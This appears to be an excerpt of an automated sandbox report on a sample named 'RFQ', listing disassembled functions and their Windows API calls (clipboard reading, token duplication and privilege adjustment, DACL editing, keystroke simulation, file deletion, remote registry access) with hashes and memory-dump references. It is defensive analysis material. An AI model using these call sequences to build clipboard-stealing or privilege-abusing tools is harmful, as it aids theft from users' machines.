                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0069EFD4
                                                                            • IsIconic.USER32(00000000), ref: 0069EFDD
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0069EFEF
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0069F005
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0069F00C
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0069F018
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0069F029
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0069F031
                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0069F039
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0069F03C
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F055
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F060
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F06A
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F06F
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F078
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F07D
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F087
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F08C
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0069F08F
                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0069F0AD
                                                                            • AttachThreadInput.USER32(?,00000000,00000000), ref: 0069F0B5
                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 0069F0BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 1155518417-2988720461
                                                                            • Opcode ID: 6ed0d2089ac3ecd84679c33984f358ce1fc18353718aba75923724f6d0b8e229
                                                                            • Instruction ID: 553b6af95405a7ba921fafe275128d49a4cec3c583aaae4e58bf7d859c60c86b
                                                                            • Opcode Fuzzy Hash: 6ed0d2089ac3ecd84679c33984f358ce1fc18353718aba75923724f6d0b8e229
                                                                            • Instruction Fuzzy Hash: 6B317071A80218BEEF312BE94C4AFFF7E6DEB44B50F118026FA01F61D1C6B55D11AA64
                                                                            Function 006E1145 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
                                                                              • Part of subcall function 006E1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E167E
                                                                              • Part of subcall function 006E1607: GetLastError.KERNEL32 ref: 006E168E
                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 006E11CA
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006E11EC
                                                                            • CloseHandle.KERNEL32(?), ref: 006E11FD
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E1215
                                                                            • GetProcessWindowStation.USER32 ref: 006E122E
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 006E1238
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E1254
                                                                              • Part of subcall function 006E1003: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E1140), ref: 006E1018
                                                                              • Part of subcall function 006E1003: CloseHandle.KERNEL32(?,?,006E1140), ref: 006E102D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 22674027-1027155976
                                                                            • Opcode ID: 931007e82b23c153c3dc739596fe5e4e99f995bc1db781512fa18e89654f165f
                                                                            • Instruction ID: 3389da78fff61ca24c8ad066b93c064bd60dcc44b8417cece7be3bc5602ddafe
                                                                            • Opcode Fuzzy Hash: 931007e82b23c153c3dc739596fe5e4e99f995bc1db781512fa18e89654f165f
                                                                            • Instruction Fuzzy Hash: 1981C2B1941349AFDF118FA9DC49FEEBBBAEF05300F148029F910EA290D7758A45DB24
                                                                            Function 006E0AA6 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E1058
                                                                              • Part of subcall function 006E103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1064
                                                                              • Part of subcall function 006E103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1073
                                                                              • Part of subcall function 006E103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E107A
                                                                              • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E1091
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E0B10
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E0B44
                                                                            • GetLengthSid.ADVAPI32(?), ref: 006E0B5B
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 006E0B95
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E0BB1
                                                                            • GetLengthSid.ADVAPI32(?), ref: 006E0BC8
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006E0BD0
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006E0BD7
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E0BF8
                                                                            • CopySid.ADVAPI32(00000000), ref: 006E0BFF
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E0C2E
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E0C50
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E0C62
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0C89
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0C90
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0C99
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0CA0
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0CA9
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0CB0
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006E0CBC
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0CC3
                                                                              • Part of subcall function 006E10D7: GetProcessHeap.KERNEL32(00000008,006E0AF5,?,00000000,?,006E0AF5,?), ref: 006E10E5
                                                                              • Part of subcall function 006E10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,006E0AF5,?), ref: 006E10EC
                                                                              • Part of subcall function 006E10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006E0AF5,?), ref: 006E10FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 4175595110-0
                                                                            • Opcode ID: b47fb3de4a7166ccbc6702fe9c20a1fc610d02d31d2575e133e2d07a1a64b910
                                                                            • Instruction ID: 149c77e7bc5fe6aedfb6e175e803b7c5bcf9eb9d23f3cb4976d36f91e537d841
                                                                            • Opcode Fuzzy Hash: b47fb3de4a7166ccbc6702fe9c20a1fc610d02d31d2575e133e2d07a1a64b910
                                                                            • Instruction Fuzzy Hash: 2B71BC72941349BBEB11CFA5DC49FEEBBB9BF04700F148215E905A6291D7B49A44CB60
                                                                            Function 006FEA26 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenClipboard.USER32(0071D0D0), ref: 006FEA50
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 006FEA5E
                                                                            • GetClipboardData.USER32(0000000D), ref: 006FEA6A
                                                                            • CloseClipboard.USER32 ref: 006FEA76
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006FEAAE
                                                                            • CloseClipboard.USER32 ref: 006FEAB8
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006FEAE3
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 006FEAF0
                                                                            • GetClipboardData.USER32(00000001), ref: 006FEAF8
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006FEB09
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006FEB49
                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 006FEB5F
                                                                            • GetClipboardData.USER32(0000000F), ref: 006FEB6B
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006FEB7C
                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 006FEB9E
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006FEBBB
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006FEBF9
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006FEC1A
                                                                            • CountClipboardFormats.USER32 ref: 006FEC3B
                                                                            • CloseClipboard.USER32 ref: 006FEC80
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                            • String ID:
                                                                            • API String ID: 420908878-0
                                                                            • Opcode ID: 82a6f30b1d7e89449e07350aa2f7959bd959baea2cd30700da44fb8933ae22b1
                                                                            • Instruction ID: ca7f51493a228218f0c0a3a11c1f4e230dddbd2e0e36384a9edaff901c33a52d
                                                                            • Opcode Fuzzy Hash: 82a6f30b1d7e89449e07350aa2f7959bd959baea2cd30700da44fb8933ae22b1
                                                                            • Instruction Fuzzy Hash: 9061ED302443059FD311EF68C898FBA7BA6BF84704F04851DF996872E2CB76D905CB66
                                                                            Function 006F68AD Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F68DC
                                                                            • FindClose.KERNEL32(00000000), ref: 006F6930
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006F696C
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006F6993
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006F69D0
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006F69FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                            • API String ID: 3830820486-3289030164
                                                                            • Opcode ID: 1910f79654e479782e117dfd805834c151242f9a873d30a9ffc7dcdea38f019a
                                                                            • Instruction ID: efe6f0a4915f985111fa873e25ab3e75c2f38f7fbe528ec8b52bc2759c313b55
                                                                            • Opcode Fuzzy Hash: 1910f79654e479782e117dfd805834c151242f9a873d30a9ffc7dcdea38f019a
                                                                            • Instruction Fuzzy Hash: 20D16DB2508304AEC350EFA4C885EBBB7EDAF88704F40491DF585D7291EB75DA48CB66
                                                                            Function 006F9560 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006F9581
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006F95BF
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 006F95D9
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006F95F1
                                                                            • FindClose.KERNEL32(00000000), ref: 006F95FC
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006F9618
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F9668
                                                                            • SetCurrentDirectoryW.KERNEL32(00746B80), ref: 006F9686
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F9690
                                                                            • FindClose.KERNEL32(00000000), ref: 006F969D
                                                                            • FindClose.KERNEL32(00000000), ref: 006F96AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: 5312a1677a95fe26215117b5250fc3b8fc8f1b5408ef01a75726a51d6b8d2c1f
                                                                            • Instruction ID: c35a4a01ac298f3282212c9334020006530f65135edcf67aa1589e7d8b90d68c
                                                                            • Opcode Fuzzy Hash: 5312a1677a95fe26215117b5250fc3b8fc8f1b5408ef01a75726a51d6b8d2c1f
                                                                            • Instruction Fuzzy Hash: EC31C37164021D6BEF25EBF8DC08BEE33ADAF46320F108165F955E21D0EB79DD458A28
                                                                            Function 0069B728 Relevance: 18.4, Strings: 14, Instructions: 881COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                            • API String ID: 0-4052911093
                                                                            • Opcode ID: a7387e2a6b511afb507444f3131057a801831e6f089bbfd856feece82a81ec1e
                                                                            • Instruction ID: c4f7babc13637dd76a3430f915153fe77c55cf76c9ecf1193ba78c75faf5d92d
                                                                            • Opcode Fuzzy Hash: a7387e2a6b511afb507444f3131057a801831e6f089bbfd856feece82a81ec1e
                                                                            • Instruction Fuzzy Hash: 8E727D71E002199FDF64CF59D884BEEB7B6AF84310F14816BE805AB395EB749D818B90
                                                                            Function 006F96BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006F96DC
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006F9737
                                                                            • FindClose.KERNEL32(00000000), ref: 006F9742
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006F975E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F97AE
                                                                            • SetCurrentDirectoryW.KERNEL32(00746B80), ref: 006F97CC
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F97D6
                                                                            • FindClose.KERNEL32(00000000), ref: 006F97E3
                                                                            • FindClose.KERNEL32(00000000), ref: 006F97F3
                                                                              • Part of subcall function 006EDA03: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006EDA1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 8703fe1995c06f774407480f21d3fc7bdd8423595f345d1431271f2ec6867d85
                                                                            • Instruction ID: 686b8bf2e9f3fb666b21f998449f016db6af142931037ba2a082d95f3a0b7fb3
                                                                            • Opcode Fuzzy Hash: 8703fe1995c06f774407480f21d3fc7bdd8423595f345d1431271f2ec6867d85
                                                                            • Instruction Fuzzy Hash: 3E31D27154071D6BDB21BFA8DC48BEE33AEAF05360F208165F910A21D0DB38DE848E68
                                                                            Function 0070BD6B Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070BE65
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0070BED0
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070BEF4
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0070BF53
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0070C00E
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0070C07B
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0070C110
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0070C161
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0070C20A
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0070C2A9
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070C2B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3102970594-0
                                                                            • Opcode ID: ba692ca5e82f60e243537eeae192a74abf18fdbc92bf07d78845675fa1bdfad5
                                                                            • Instruction ID: f34fe2919a32865dbabc4d9cf89a71d1a69b51f5ff76019fbb5145e03185c690
                                                                            • Opcode Fuzzy Hash: ba692ca5e82f60e243537eeae192a74abf18fdbc92bf07d78845675fa1bdfad5
                                                                            • Instruction Fuzzy Hash: E4025970604200EFD755DF68C895E2ABBE5EF88318F18869DF849CB2A2DB35ED41CB51
                                                                            Function 006F80B3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 006F8175
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006F8185
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006F8191
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006F822E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F8242
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F8274
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006F82AA
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006F82B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                            • String ID: *.*
                                                                            • API String ID: 1464919966-438819550
                                                                            • Opcode ID: a0ac8d0c64c9841bb840e79797c1c6b2f733f9cdc963e63b7eeae532e10f12a2
                                                                            • Instruction ID: 88088ca37ac975e524c1fcf5b138d98fabdd2ffb58abcf4493662dd58aaccca7
                                                                            • Opcode Fuzzy Hash: a0ac8d0c64c9841bb840e79797c1c6b2f733f9cdc963e63b7eeae532e10f12a2
                                                                            • Instruction Fuzzy Hash: 2861BEB15047099FCB10EF60C8859AEB3EAFF89310F04895DFA89C7251DB31EA05CB96
                                                                            Function 006ECF94 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                              • Part of subcall function 006EE0B7: GetFileAttributesW.KERNEL32(?,006ECEB3), ref: 006EE0B8
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006ED040
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 006ED0FB
                                                                            • MoveFileW.KERNEL32(?,?), ref: 006ED10E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 006ED12B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006ED155
                                                                              • Part of subcall function 006ED1BA: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,006ED13A,?,?), ref: 006ED1D0
                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 006ED171
                                                                            • FindClose.KERNEL32(00000000), ref: 006ED182
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
